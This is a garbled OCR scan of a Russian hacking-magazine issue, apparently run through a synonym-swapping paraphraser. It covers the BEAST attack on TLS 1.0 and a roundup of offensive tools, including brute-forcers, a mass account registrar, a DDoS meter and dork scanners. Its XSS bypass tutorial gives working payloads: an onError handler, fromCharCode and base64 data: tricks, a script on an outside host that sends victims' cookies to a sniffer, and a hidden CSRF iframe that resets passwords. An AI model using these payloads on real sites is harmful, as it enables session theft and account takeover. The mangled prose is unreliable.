ОСОБЕННОСТИ ПЕРЕБОРА Если передача посчастливилось уполномочить до тому а з ащищенному кана­ лу связи, в таком случае ранний агрегат нового сведения задним числом шифрования будет выглядеть следующим образом :

Если признать возможным , зачем у нас вкушать груда времени равно масса по­ пыток , наша сестра можем передразнивать этуте х нику опять-таки равным образом вновь, все еще безвыгодный найдем верное значимость М. Однако бери практике бло для М

-16 байтов на длин у.

Даже разве автор сих строк зна е м спица в колеснице во со е х байт помимо дву х , получай то, воеже отга­ С1

Е (Кеу ,

М1 xor

IV)

передать оставшиеся байты , нам понадобится 0 л 05[32 068) попыток . А буде

=

(Ci- 0 xor IV xor Р) xor Е (Кеу, (C i - 0 xor Р)) Ci Е(Кеу,

IV)

да мы со тобой малограмотный знаем общо ничего? Короче говоря , квалификация может сработать лишь на единственном случае- кабы у тебя очищать некоторое ограничен­

ное состав предположений по поводу значения М. Еще точ­ нее: наша сестра должны уметь большую пакет содержимого сего блока- сие

Все, ч т по части мы вместе с д елал,- зто использовал полную форму склерозник М1,

п осле ч его упростил формулу, используя т с факт, что-то

[IV хог IV)

непревзойденный манера утилизировать описанную уязвимость. Тут есть одна хитрость. Предположим, что-то злодей может контролиро­

уничтожи т ся [замечательное характерная черта XOR'a) . Получается, сколько разве

вать, каким образом эмпирика будут находиться во шифруемом блоке.

наше предсказание более или менее пароля Элис верное [то питаться М

Вернемся заново для примеру из Элис. Допустим , автор знаем, аюшки? пикет

воистину равен Р), ведь начальный зашифрованный объединение нового

ее пароля- 0 символов. Если враг может разместить па­

сведения С1 довольно равен впереди перехвач енному Ci! И наоборот:

цена таким об бразом, дабы во главный устройство попал только лишь единодержавно знак , а оставшиеся со емь попали во следующий. Идея во том, чтоб вручить в первых 05 байтах первого блока действительно известные причина -тогда можно хорошенького понемножку подогнуть всего только заключительный байт, являющийся первым символом пароля. Например, допустим, что-то нужно послать строку

МАСШТАБЫ ПРОБЛЕМЫ

вида:

«user: alice password: * * ****** >>,где«********>> - непосред­

ственно из ам батман цена . Если злоумышленнику удастся пере д ать строку так, с намерением возлюбленная была разбита н а следующие блоки <<[l ice pa ssword: И так, каковы а м акробат воздуха ш табы бе д ствия? Или иными словами- кто именно уязвим?

* ] [ ******* ... ...... ] >>,то п одбор первого символа пароляуже отнюдь не

П рактически все так же кто сайт, ис п ользующий TLS1 .0, какой является больше всего

к тому идет невыполнимой задачей. Напротив, на худ ш ем случае нам по­

рас пр остраненным протоколом безопасности . Забавно, сколько позже всей этой п ротокола- TLS 0.1 да выше. Но многие ли сайты уж не долго думая поддерживают сии

надобится жалкие 056 попыток . А во случае особой удачи равно совершенно одна :)! Подобрав главный байт, не грех свести границу разбиения получи один символ: ведь вкушать уполномочивать во первом сообщении 04 накануне извест­

п рот околы? Да по существу никто! Посмотри сверху иллюстрацию. Даже вопреки

ных байт. Блок пока что короче иссякать двумя первыми байтами

ш умихи не без; BEAST, многие стали показывать забота ко больше новым версиям

получи и распишись то, что такое? TLS 0.1 ранее пятеро лет, его используютединицы! Другой вопрос: в качестве кого подстраховать себя? На самом деле, впадать в панику в отлучке

смысла-уязвимость сделано исправлена во большинстве браузеров. Но даже если па­ ранойя беретик верх, можешь попытаться отключить небезапасные

во спринклер ре ITLS 0.0 равным образом SS L З.O), а гуртом равным образом Java . Правда, отнюдь не есть смысл на этом случае силь н об удивляться, который мно г ие сайты перестанут работать.

D D

размер блока""

известные байты , добавленные браузером

известные байты, которыми управляет злоумы ш кудряш н ик неизвестные байты, которые злоумы ш ле н ник хочет рас ш ифроват ь

кордон блока

Support

0

Вest

protocol

гр а н да ц а бл ока

jP\o\s\т\ \ l lдlдtдlдlдlдl lнlтlтtPI граница бл ока

Тl.Sv1 .0 Тl.S

v1 .1

Тl.Sv1 .2

093,286

092,386

016

054

09

09

0R

JS 0 ~ \r 0\nl

R

0Q 0 U 0 Е

0 S 0Т 0 sl О 0 D 0У

• .. .

j

Статистика использования разных протоколов

П е р е шале запроса держи сервер для того реализации ата ко да в

SSL

ХАКЕР

01 / 054/2 011


ВЕАSТ: чудовищный отправка SSL-кукисов

-ssh-80x2

насчёт -о

0

О-о

0 о-о

относительно

по части -- по отношению

0 0

О-о

0 0 о-о

в рассуждении -0 - касательно

о-о

0

0 1

0

о--о

0

0

что касается

касательно

о-о

0 о-о

0 о

er Tha1 Duong (

.со

)

)

Server 0n1 0 \1zed, l1sten ng on 0.8. 1 BEAST gent to 092.168.1.67 arge 0ng h ps://paypat.co Cook1e so f r: G en_US ЗВС : оСВ&Ь XscjqZ7 0VOxUL0853 Зn gGc\AP rbzFXiq KxhFgBLBvq d8-rHfloDZ1S90W-S80X2bU8vf80sg IpGehAKO AVZvRG_At7zhJA)4NAlc\0Vp\7Jo T7612pz j P2iSzP SY 4kibG1qб G: Fi n \ cookie: н~веь XscjqZ7 бVOxULOBSЗ ЗntgGctAP VrbzFX1q xhFg8L8vqKd8-rHfi oDZ1S90W- S80X2bUDvf80sg IpGeh VZvRG_ 0zhJA)4 A1c\DVp\7JoT7612pzjP2 SzPvSY8 4kibG1qб G: took 0 0.84 seconds :-) >

Оер\оу

Всего

003 секунды потребовалось с целью расшифровки секретной кукисы PayPal

пароля , основной с которых автор сих строк ранее подобрали. И ещё : получаем

результате ходящий поверенный истасканно перестал нести протоколы и заботы . Текущая

056 необходимых попыток ради того, с целью вычислить второстепенный его байт.

трансформация

Процесс не возбраняется повторяться поперед тех пор, временно шаг дело безграмотный бросьте подобран.

изо агента, написанного возьми Ja v ascгipt/Java, равным образом сетевого снифера .

Этот воззрение используется да на BEAST на подбора секретной кукисы, а во качестве известных данных используются модифицированные

BEAST, которую ребята представили общественности , состоит

Незаметно насадить апплет иначе говоря JavaScгipt пользователю на самом деле отнюдь не является такого типа полоз сложной задачей. Но остается не­

заголовки запроса. Подбор ускоряется после контокоррент сужения возможных

великоватый особина - на того , воеже вместе с крипт или — или апплет могли отправ­

символов [в запросе допускается эксплуатировать вдалеке невыгодный все], равно ради контокоррент

лять сведения до установленному жертвой соединению , необ х одимо

предположений имени кукисы.

пройти пока что равно ограничения SOP [same-oгigiп policy, обыкновение ограни­ чения домена]. Это важная аристогенез безопасности в целях некоторых языков программирования в стороне клиента, таких в духе JavaScгipt.

Впрочем, самоё небезупречность равно оп ти мизированный средство на ваша милость п ол н е­

Политика разрешает сценариям, находящимся нате страницах одного

ния дешифрования по отношению число «пи» са ны уж сыздавна . Ч так в сущности посчастливилось

сайта, подход для методам да свойствам дружище друга сверх ограничений , только

разработчикам BEAST, в такой мере зто провести в жизнь до этого времени необходимые воздух

предотвращает ход ко большинству методов равно свойств пользу кого страниц

в целях выполнения атаки:

бери разных сайтах. Проще говоря , запустелый получи одной странице

• • •

атакующий повинен кто наделен осуществимость проелушивать сетевые

жертва отнюдь не сможет совершать требования для нужному сайту [скажем , ~

соединения, инициированные браузером жертвы; у атакующего должна оказываться реальность ввести поверенный во браузер

com ]. Чтобы обогнать политику SOP, авторы нашли во виртуальной ма­ шине Java Оdау-уязвимость равным образом написали про нее шабашничающий сплоит.

жертвы;

Только безграмотный думай, в чем дело? зто позволяет произносить существующие кукисы.

доверенное лицо обязан совмещать возмож н волос исполнять произвольные

Если бы сие было так, позднее дьяволом нужен был сполна нынешний склока вместе с за­

[более-менее] НТТРS-запросы;

шифрованным трафиком? Используя сплоит для того обхода SOP, не возбраняется

В самом начале материала аз многогрешный еще говорил, который важной в какой-то степени

заниматься требования равно заглядывать ответы сервера [в часть числе ответы из

BEAST является приближенно называемый агент, кой сможет п ередавать

новыми кукисам и], хотя запрещается считывать существующие кукисы, ко­

нужные злоумышлен н ику зап ро сы в сервер [по защище нн ому пр о­

торые сохране ны на браузере . Разработчики делятся целой историей

токолу]. И сследовате ли соста вили из 14 хилус различных технол по отношению гий да

относительно создании аген т а на своем бло г е [bit.ly/g6AebBI.

браузерных плагинов, тот или другой могут реализовать сие условие. Как оказалось, их порядочно м н что касается го: Javascгipt XM LH ttpRequest API , HTML5 WebSocket API, Flash URLRequest API, Java Applet URLCoпnectioп API, и Silveгlight WebCiieпt API . Однако на первом приближении есть такие с

В вывод руки чешутся пометить большой усилие исследователей,

них оказались непригодны изо - следовать наличия ограничений, препятствую­

полет назад, да да приложили беда сколько труда для того того, дабы понудить

щих реализации атак. В результате остались лишь HTML5 WebSocket API, Java URLCoппectioп API, равно Silveгlight WebCiieпt API . В момент,

утилиту работать. Здесь я хватит очень упростили описания

рано или поздно иссле д ователи сообщили относительно своем баге вендорам, у них держи руках

чили истинное утеха ото прочтения детального документа через

был корпящий а ге нт получай базе HTML5 WebSockets. Но методика

исследователей, во которых они на деталях рассказывают что до реализо­

сия беспрестанно развивается, а своевольно учет неослабно меняется. В

ванной атаке.

ХАКЕР

01/154/2011

которые сумели проэксплуатировать небезупречность , забытую всеми цифра

используемых техник, пытаясь отдать основную идею . Но я полу­

Good jоЫ :::И:

075


взламывание

Marlicq 084888, http://snipper.rul

X-Too\s СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗАБЕЗОПАСНОСТИ

Автор:

Автор:

Zdez Bil Уа

(i]Pro

Автор :

lnsecurity Research -.;;;;:-_...,._

URL:

..а~ _

URL: bit ly/pqcYCq

Ьit.ly/q4POte

URL: insec u rjtyresea rch. ~

urce: О

re<~ds: О

ood: О d: о ft:O

Наконец-то во паблике появился порядочный

Не могу отнюдь не расчлениться вместе с тобой пока что одной за­

IN SEC T Рго- сие

сканнер плагинов пользу кого популярнейшего отметка

мечательной софтиной про работы со WoгdPгess.

лит к пентеста равным образом аудита безопасности твоей

WoгdPгess! До этих пор однако решения подобного

На данный присест сие схема подина названием

рода были либо на глубоком подле вате, либо без удержу

Bгute, предна значенная, в духе сие отчетливо из первого

WP

новомодный шаровой пакет ути­

сети. С через сего комплекса твоя милость можешь с легкостью мониторить почто желать нате экземпляр

тормознутыми равно глючными. Итак, встреча-

взгляда, с целью брута аккаунтов равным образом танцевальный шаг ролей поль­

наличия последних брешей на безопасности. О

ем : WoгdPгess Р&Е ото постоянного автора­

зователей блога. Казалось бы, зачем чтобы таких

серьезности продукта говорит хоть бы бы оный факт,

фигуратора нашей рубрики

целей чище подошел какой-либо выдающийся

почто дьявол построен получай известнейшем фреймварке

график предназначена отнюдь не только лишь с целью опре­

Zdez Bil Уа.

Данная

брутфорс веб-форм, а на какого хрена издерживать свое

Metasploit.

деления используемых получи и распишись благе плагинов, однако равным образом

минута получай настройку оного, когда не грех унаследовать

ностей , которые заключает комплекс:

ради предупреждения что до возможных уязвимастях

шабашничающий собрание души да удобно? Особен­

по сию пору сплойты, найденные со через сканера

на них. Сканер умеет вытворять следующее:

ности проги:

INSECT; 1Pv4 да 0Pv6 эксплойты;

Вот чуть жалкий ведомость вкус­

обрекать версию WoгdPгess;

помощь

синтезировать ее возможные уязвимости;

многопоточность [max . 00];

обрекать используемые плагины равно их вер­

помощь НТТР[S] -прокси;

напрямую из-под жертвы;

эти [по базе];

магнето Souгce;

удален ные/локальные/сliепtsidе эксплойты;

определятьуязвимостидлянайденныхплаги­

возможностьдобручивания быть остановке

SQL/XSS/PH Р-эксплойты;

нов.

б рута.

автоматическийпентес~

На незавершенка брутфорса выглядит чрезвычайно три­

загрузкасплойтовпорасписанию;

Пользоваться прогой никак не просто, а жуть

SSL;

поддержкатуннелингадлязапускасплойтов

просто. Для азбука работы достанет только что

виально. Для азбука работы вместе с ним тебе доста­

обновления каждую неделю;

выжать нате <<Старт>> равно терпеть результата. Если

в точности как только построить опись из лагинами да

подпора пользователей;

ска нер невыгодный сделал ни одного плагина, твоя милость

паролями от через встроенного генератора

создание отчетов во завершении от ка на;

можешь постараться настройки <<Считать

alias но забить неподалёку файлик Souгce.txt со со­

совершенно последние эксплойты с

плагином Код

держимым вида:

Также изо ос н овных фишек сего комбай-

003>>.

002>>

сиречь «Считать плагином Код

В результате твоя милость получишь alias роспись

валидных используемых плагинов: тож ни

одного, либо всегда последовательно . В качестве бонуса автор приложил для программе базу всех плаги­

н а допускается подметить как собака благоприятный

admin:123 admin:qwerty ololo:wtfwtf

плагинов со сайта wordpгess . oгg.

076

интерфейс, запас в кругу опасным равно безопасным сканированием, которое дает случай

прокладывать безобидные атаки не принимая во внимание возможности повреждения системы. Если тебя заинтересовал

нов, имеющих уязвимости держи сей момент,

а опять же сто остальных в особенности популярные

Metasploit.

Также возбраняется никак не по отношению тметить оный факт, что-то для г а является целиком и полностью опенсорсной .

таковой продукт, ведь сове т ую заскочить возьми его официаль­ ную стра ничк у равно взглянуть видеопримеры.

ХАКЕР

01/154/2011


X-Tools

Автор :

....

I IГ1 ~ ==~'--------------. 0 ~

Turbo Mailer URL: Ьit ly/oovCRY

АВТОРЕГГЕР

MAIL.RU TURBO MAILER

Одной с самых популярных Н-тем во последнее

воспользоваться одну равным образом туже дату рождения в целях

минута из чего можно заключить царапанье различных автореггеров

всех;

сумме равно вся. На данный крат хочу по мнению д елиться со тобой

подбирать пол;

оче р ед н ым рег г ером аккау н тов популярного

мудрить а ватарки на «Мой мир>>;

портала Mail.гu. Отличие данной проги ото других

уделять шанс ввода капчи;

ей подобных заключается во универсальности да

внедрять нарост говорят вместе с через сервиса aпtigate.

расширенном очень функционале. Вот, ась?

сот;

умеет программа:

проверятьбалансантигейта;

IIWoi. . . -J [n:~=.... ~•Тirt.-..r*I ЬJ IC8d

фиксировать e-mail возьми кому лишь только не лень владение сайта

мучиться путем прокси IHПP/SOCKS4/

mail.гu;

SOCKS5I;

регистрироватьаккаунтвсоциальнойсети

авторизоваться нате mail.гu с программы. В качестве бонуса творец сейчас приложил ко

«Мой Мир>>; ставитьрандомныйпарольот6до40симво­

программе изрядный перечень женских равным образом

лов;

мужских имен равным образом фамилий. В зависимости с

воспользоваться одинокий парольдля всех акков;

того, каковой настил твоя милость выбрал во настройках реги­

оценивать рандомную дату рожде н ия;

страции, прога хозяйка подставит нужные ФИО .

Автор : ........."",;~---

M!axPain, Perplexity

Автор :

Автор:

0MaxPainCode

_Aiien_

URL: twitter com/#1/max ~

URL:

Cl.mwii:SetYerTr.tric:I71Мt- 02::SO: I S"" ~Sиv8fTr tffic r t13Мs

URL:

02:30:161'111

Oorr'ents.n.<Trlllf\c:171Nsl2:31hl7"" Clorтanr.SarvvТnll'ic: t72!olo; 02::JII:18 ....

twitter com/max~

A.tt8dt--.....

AIDdcКН-""""".Ч12:JO:t•""

A.I12:30<17 ....

Attlldc--~At12:30:111'111

--

Ьi t . ly/r37IA L

f-----,

~lo Y'III'fМ'I'IOW1oOo

~---

01

----

Y.wi'•~ Y~~

....з.оь.,~-

ИЗМЕРИТЕЛЬЭФФЕКТИВНОСТИ 0005-АТАКИ

VULNERABILITY MASTER:

ЛЕГКИЙ GOOGLE-XAKИHГ VulпeгaЬility Masteг- зто следующий хакерекий

И значальне расписание

комбайн, главной отличительной фишкой кото­

лась особо про владельцев зло-ботнетов,

ля ради твоим дедиком. Ту л следовать может неравно невыгодный однако ,

рого является пропиханный скэнар сообразно доркам

желающих замерить действенность своих атак,

так приземленно все. Посмотри ведомость возмож­

Гугла. Причем, приходится заметить, в чем дело? подобных за

направленных возьми отделение на обслуживании . Однако

ностей:

функционалу гуглосканеров поперед этих пор на пабли­

владельцы атакуемых ресурсов равным образом простые

шанс создания/удаления учеткии

ке малограмотный было. Особенности:

админы равно как почасту берут в оснастка заданный

смены ее пароля !если принимать карт-бланш админаl;

скэнар подаркам Гугла;

инструмент, с тем проследить, подвержен ли их

частный мини-браузер;

билдер SQL-инъекций;

сайт ддосу иначе нет. Алгоритм работы тулзы до­

отправка корреспонденция возьми почту из вложением;

разведка различной информации об жертве;

статочно простой: DDoS Тгасег короче непрерыв­

быстрая скачка Cleaгlock;

непохожие утилиты для того конвертации

хотя пинговать зависимый атаке фонд да ото­

быстрая скачка б рута да VNС-сканера;

cтpoк.

бражать эпоха задержки ответа ото него. Про га

остановка любого процесса на системе;

Так равно как со различными сканерами уязвимс ­

может существовать полезна на следующих случаях :

SQL-

етей твоя милость во который бы ведь ни стало ранее во своей практике вместе с т алки­

0.

вался, расскажу в нескольких словах об алгоритме работы с гугл-доркером:

0. Загружаем листок дорков сиречь юза ем встроен­ ный !например, <<cmspages.p hp?id=>>, <<game. php?id=>>, <<index . php?id=>> равным образом т. д.l; 2. Указываемлимитсайтовдля со ка в lподефолту 0DOI; 3. Указываем разведочный насчёт п буян т по части р !по дефолту <<inurl:>>l; 4. Жмем бери кнопку<<Sсаn>>; 5. Наслаждаемся результатами скана равно близ

DDoS Тгасег создава­

проворный включение

бажными скриптами, коташка орые кушают несть

задач.

0.

Если твоя милость переехал получай недавний сервер да тебе важ­

обновляет свое сочинение да вводит на него безвыездно но­

хотя знать, довольны ли публика скоростью

вые равным образом новые фичи. Из основных сугубо вкус­

работы твоего ресурса;

ных возможностей дозволено спрыснуть следующие:

Если твоя милость кстати стал следить

0.

знать, в отдельных случаях злоумышленники запустят ддос.

мохо сервера;

Для поиска уязвимсетей автосканер просто­

анализаторпримерного времениначала

ООоS-атаки;

скриптов, найденных объединение твоим доркам. Если сверху

сворачиваниевтрей.

сайте выводится ошибка, в таком случае он, скоренько всего,

Также советую осмотреть обучающее видео

01/154/2011

0. Огромный каталогскачиваемых программ в целях

Функционал трейсера довольно-таки аскетичен: подробный ложбина пинга;

сообразно адресу Ьit .l y/ пHH x Am .

Многаязычность lв часть числе да интересах создания

учетокl;

д оступность своего сайта, так завсегда будешь

элементарный да серединный пережиток оттестируе­

ХА К Е Р

CMD, реестра равно диспетчера

Также игра стоит свеч заметить, в чем дело? сочинитель беспрестанно

ресурсов сервера;

0.

желании запихиваем их вот замонтированный

уязвим.

умозаключение всех работающих во системе процессов;

Если твоя милость экс п ериментируешь от какими-либо

<<Vu 0пега Ьi 0ity Scann er>>. напросто подставляет кавычку на формат

Ded Toolza- сие крутейшая обслуживающая программа чтобы контро­

работы со дедиком;

0. Обходблокированиянекоторыхфункцийад­ министратором системы !например, запуска командной строки!;

0.

Подробная данные одедике во соответ­

ствующей вкладке. Все внутренние резервы программы изложить просто невозможно, приблизительно сколько советую несложно одолжить равно по­

обследовать ее во деле .

077


хакинг

кросс-сайтим сверху полную! ПОЛНЫЙ гидпохss­ Уязвимостям

ФИЛЬТРЫ И ИХ ОБХО Ы Как твоя милость уж беспременно знаешь, интересах предотвращения уязвимастей

• XSS- сие уязви­ мость веб-страниц,

класса XSS программисты используют небо и земля встроенные воз­

возникающая во

можности языка, держи котором пишется код. В РНР такие внутренние резервы

результате попадания в них nользователь­

ских JS-скриптов.

• Событие-это

реализуются не без; через специализированных функций чтобы фильтрации НТМL-кода. а да со через регулярных выражений. Одними с таких функций являются htmlspecialchars() да strip_tags(). Рассмотрим неабстрактный элементарный присутствие мер, во котором веб­

какое-либо действие, осуществляемое

Всего лишь только

0 парение

отдавать твоя милость

пользователем либо браузером .

расцвета

XSS

опущены на выводе нераздельно со самими тегами:

уязвимостей.

разработчиков достигала

Вся информация предоставлена исключительно в ознакомительных

невыгодный не мудрствуя лукаво высокого, а

аж профессионального

уровня! Но на наше время эксплуатация таких багов

ни компилятор малограмотный несут

ответственности после

кому всего не лень возможный вред, причиненный материалами данной

да других

XSS

вкусностях.

При таком раскладе отсутствует смысла рисковать пентестить адрес из п омощью тегов

<script >,

что-то около в духе получай выходе у нас получится хоть сколько-нибудь видать вона этого:

<img srс="[твой передача вместе с удаленными тегами script]" > Как но пустить JavaScгipt, коли наш брат никак не можем эксплуатнуть кон­

струкцию <script>? На поддержка приходят JS-обработчики некоторых

• razOr.name интересная XSS информация

• ha ckers org/

Xll..hirnl -

самый

славный панорама

xss

• kaпicq . ru/sпjffer

НТМ L-тегов. Дело во том, что-то нам аспидски повезло, что-нибудь дедукция информации проис хо­

дит в недрах тега IMG. У данного тега глотать хороший отделочник опЕггог

!другие обработчики в целях остальных тегов твоя милость сможешь без участия труда обнаружить на

Google), каковой работает следующим образом:

-отличный онлайн­

<img src="img.jpg" onError="alert('кapтинкa никак не

снифер

загрузилась');" >

• Ьit.Jy/bK7NW7 универсальный вектор XSS

• drakasmit.ru/kakrabotal-xss - XSS иSЕО

078

?>

статьи.

затрудненной. Я расскажу

фильтрах, способах их обхода

<?php echo(' <img src='" . strip_tags($_GET[ 'img']). '" >' );

целях. Ни редакция,

становится совершенно более тебе в рассуждении самых популярных

небезапасных символов"<" и">" со через функции strip_tags(). В данном случае символы, ответственные вслед помета тегов, будут

был в силах застичь настоящую эпоху

Тогда ноншалантность веб­

построитель попытался осуществить полную фильтрацию потенциально

То глотать возле ошибке запустится кто хочешь JаvаSсгiрt-сценарий, помещен­ ный во обработчике. Относительно нашего примера сие склифосовский эффективно при вводе следующего значения на $_GET[ 'img' ]:

ХАКЕР

01/154/2011


XSS: кр осс-с айтим получи полн у ю!

ТОП-5 ЗАЩИТ ОТ 1.

$res [ )=ord ($sym); } return implode( ", " , $res); } echo(vcifry( "кoд JavaScript" )); ?>

XSS

Защита функцией htmlspecialchaгs(). Данная круг обязанностей преобразует объясненный ей аргуме н т на НТМL­ сущности, притом происходит реорганизация именнотех симво­

Вызов данного стих из через JavaScгipt короче смотреть сле­

лов, которые являются потенциально небезопасными.

дующим образом:

0. Защита функцией stгip_tags().

<scri pt >eval(Str i пg.fromC h arCode( 018 ,

07 , 014, 02 , 085,

В орден с htmlspecialchaгsll данная связка удаляет изо строки аргументатолькосамитеги,причемвторойаргументслужитдля

018, 016, 06, 09 , 011, 011, 087, 085, 081, 01, 09 ) ) </ script >

ук а зания претензия л юче н ий, котище орые отнюдь не нуж н в отношении крюк л ять. Через нее спо­ кой н в рассуждении минуя т строки:<,>,<

Фильтрация любы х символов, кроме<>: /.=

img .

В этом примере не факт ли получится свободно во п исать шифр

0.

JavaScгipt во страницу. Зато существует прекрасная мочь е г насчёт

ВВ-коды .

П ро п уск всего что до п ределенных тегов, по временам вовсе во отличный форме,

вызова изо внешнего сценария. Для сего дос таточно прос т в рассуждении соз д а ть

нежели позволяют стандарты

*.js-файл, где, для примеру, содержится оный но самый ко д по части тпр авк да

HTM L:

кукисов бери снифер, равным образом погрузить его для какой приглянется веб-сервер.

Пример подключения внешнего скрипта:

[video=htt p ://video.com/vi deo. mp4]My Video[/video] 4.

Регулярные выражения .

<script src=http : //nash.host .ru/sc ript .js></script >

Кто-торегулярки любит, некоторый нет, а бог знает кто ажно предпочитает написать свою собственную, от которую безвыгодный проходят потен­

Единственный мин усище такого способа заключается на том, сколько равным образом д ет

циально опасные символы другими словами теги. Удобно на случае исключения

призыв для конкретному серверу, а значит, допускается обн а ружить

аргументов с за пределами д ряемого те г а безо изме н ения НТМ L-сущности

злоумы ш ленника .

оставшейся часы т и.

0.

Самописные функции .

Всевозможные рекурсивные парсеры строк, которые ужас гибко борются не без;

XSS, т акже достаточно п опулярны . Хотя на самописных функ­

циях незначительно чаще позволено выискать какую-либо небезукоризненность .

!@#$%"&" oпErro r="alert(1);" musor=" На самой странице автор там видно будет вона этакий ито говый ко д : Заветное что до кошко aleгt i 'XSS'I

<img src="!@#$%"&" o п Error="alert(1);" mu sor="" > Как облик н касательно изо рядом мера, карта отнюдь не загрузится да сработает адрес

с обработчика оп Е ггог- алерт не без; чис л ом

0. Разумее т ся, вместо << alert(1); >> позволено всунуть внеочередной JаvаSсгiрt-сценарий, пред­ назначенный в целях отправки пользовательских кукисов получай снифер .

Кстати, подобную атаку мож н касательно продать равно во случае вместе с функцией

html speci al char s(), коли во НТ М L-исходнике страницы во а тр ибутах используются одинарные кавычки либо — либо но неграмотный используются вовсе.

Фильтрация любых символов, кроме<>() https://issuu.com/ На практике часто вс т речаются от л учаи, ко гда<«>> и<<»> малограмотный

l

Вкпадю•

~щен"е Уоедомен"я

~ Включить JavaScфt

~u - ...

-,...

~ Включитьмагины

фильтруются, но, например, безвыгодный проходит плюс, двоеточие или — или слеш. Что готовить на таком случае? Можно представить пускать в дело метод запуска JS-кода, преобразованного на числа. В этом могут помочь две функции JavaScгipt, а именно:

eval() да String.fromCharCode().

Первая цель выполняет адрес JavaScгipt, тот или иной д ин ей на

Истор.1Я

с--Паранетры стипей ..,

Cookies ~сность Сеть

Гlаранетры содерж>110ГО уст..--тся чтобы каждого IМ!б-уэла

текстовом виде. Вторая- преобразует во молитва числовые значения

символов. Для перевода текста на такую форму довольно написать простой скрипт держи РНР:

Гlаранетры JavaScфt

/laнero.1 IIНСТJ!ун. ' ' Г<>РЯ'-'И"КЛ. Управлен..,е очко

.. ,

У,..,авпение настройками веб-<аоfта ... j 3абпокирооанное содержмое ...

<?ph p functioп

vcifr y($text )

$r es=array (); foreach (str_spl i t($text , 0 ) as $sym)

{

ХАКЕР 01/154/2011

Нет Ja vaS c г i pt- вышел п ро б л ен

079


взламывание

ВЫЖМИ ВСЕ! Гд е равным образом по образу проэксплуатировать уязвимости в виде

XSS?

Е сли я вставим этикукисы для себя из

<? php

через насчёт число «пи» достоинство ны х раньше способов, ведь нич е г по отношению

Вот серия самых пресвитер улярных

направлений: Доступ Как твоя милость еще понял, одна изо главных целей

XSS заключается собственно на том, с тем получить cookie жертвы да понимать во ее аккаунт. Для

<h l

сего надлежит обнаружить соответствующую

family : verdana;" > Дo кaжитe,

уязвимость, засунуть для страницу скрипт

бот:

отправки печенек н а снифер, а эатем использовать сграбле нны е п е ч еньки про

сим недобьемся, что-то около на правах се рвер sos тавил

$id=mysql_fetch_array(mysql_ query( "SELECT id FROM kapchi;" )); $captcha_id=$id[ 'id' ]; echo('

сессию к примеру так:

$session=md5($login. " : " .$passwd. ":" .$_ SERVER( ' REMOTE_ADDR' ]) ;

style="color:gray;fontТеперь изучим сайт. На сайте глотать модель

который Вы безвыгодный

смены пароля на кабинете пользователя. Смена

</ hl > <img src="http: // nash.host.ru / captcha. php?img=' .$captcha_id. '" >

происходит потом следую щ е г что касается вслед пр оса :

/c hangePasswd?oldpassword=(CTAPЫЙ

доступа для ни туды и ни сюды сайт.

ПAPOЛb]&newpassword=(HOBЫЙ ПАРОЛЬ]

'); Трафик (баннеры, голосования, сплойты равным образом

?>

многое другое)

XSS

Наши действия- инвагинация скрытого

дозволяется пускать в дело вот и все да с целью

добычи трафика. Например, из через вставки

ifгame, исходя с данных во печеньках:

Подробнее что касается данном векторе читай в октябрьском номере нашего журнала.

ifгame стих связки эксплойтов не так — не то ажно

CSRF

открытияновогоокнасоссылкой.

Иногда , инда имея логин равно nа роль/сессию, Рабочая сила Через хитрые комбинации JavaScгipt

автор сих строк неграмотный можем попасть на аккаунт, таково в духе привязывание

+ РНР

может существовать ко iр-адресу, браузеру равным образом другим

дозволено обманывать банальн у ю прогрузку капчи

данным. Поэтому

интересах ее халяв н ой расшифровки юзерам да чужого

Н о, предвидя конструкцию сайта, ты да я всегда в одинаковой степени

XSS на чистом виде невыгодный пройдет.

ресурса . Для сего атакованная этап

сможем жопа сть на аккаунт. Каким образом?

<html > <script > document .get ElementsByTagName( 'html' ) ( е ]. innerHTML +='< iframe src=" [ЛИН К НА СМЕНУ ПАРОЛЯ НА ТВОЙ]" border="0 " frameborder="0" width="0" height="0 "></ iframe > ' ; </scri pt >

блокируется поперед тех пор, в эту пору поль зователь безвыгодный

Пр е д из тавим , ась? на сграбленных п е ч е нь ках

введет шифр вместе с нее:

абстрактного рес урса да мы вместе с тобой нашли такие из-за 14 си:

</ html >

cscript src="http :Jlnash.host . ru / script. js" > //код файла script.j s

login=admin password=1234 session=f13db539e8aebff0c82ce57a05d17b9f

потребный нам юэер самовластно себя сменит танцевальный шаг роль, даже если

Таким образом, зайдя для уязвимую страницу, не подозревая об этом .

Фильтрация любых символов, кроме<>:;/,= Здесь самое лучшее постановление заключается во использовании пр ото­ кола

«data»,

тот или иной основательно может придвинуться ради вставки п роизвольнога

кодир ован н об го на

base64 стих на аксессуар «SГС >> . Прим ер экий вставки:

<s cript src=data :;ba se64,YWxlcnQoKTs=></s cript > Синтаксис работы от протоколом

<<data >>

выглядит порядочно

тривиально:

dаtа:МIМЕ-тип;кодировка,данные

Здесь << эмпирика >> - сие скандально известный alert() , закодированный в base64. Указанный вместе с п особ работает вдали отнюдь не везде, только его главное преимущества заключается во том, что такое? н е засвечивается адрес сервера .

Вставка данных на JS-код бери странице Тонны новых

XSS уязвимастей

Внедрение произвольнаго заключение во НТМL-ст раниц у может встре­

титься идеже уго дн о, например, од н ажды в одном изо ресурсов автор обна­ ружил оченно уморительный происшествие вывода пользовательских данных прямо на JavaScгiptl Выглядело сие приближённо так:

ЗАЩИТУ МОЖНО ОБОЙТИ, ЕСЛИ ИСПОЛЬЗУЕТСЯ ОДНОРАЗОВОЕ УДАЛЕНИЕСЛОВИСИМВОЛОВ 080

<html > cscri pt > var а=" <?php echo($_POST('data']); ?>" ;

/1

по отношению перации вместе с "а"

ХАКЕР

01 / 054/2011


XSS: кросс-сай т им н а п олную !

</script>

f Exploi-c Ticle: 1 Gooc;rle Do.rk: -

i'lordp:re~s

- Bee:r Recipes v . l.O XSS

f Auchor: TheUzuki

</ht ml>

f Sotcware Link: h-ct:p: 0 /opensourcebrew. orq/beer-recipe.s-pluqin/ f Ve:rsion: v.l . O

В таких случаях нельзя не равно д остаточно п росто разобрать по косточкам

НТМ L-ко д со т раницы равным образом согласно н автор ть, ч т что до про успеш н ой а таки н ужак н об общем л равным образом ш ь выйти вслед за границы инициализации переме н утнапиштим равным образом во н едрить ядови т ый сценарий :

023" ; al ert( doc ument.c ookie ) ; Ь="

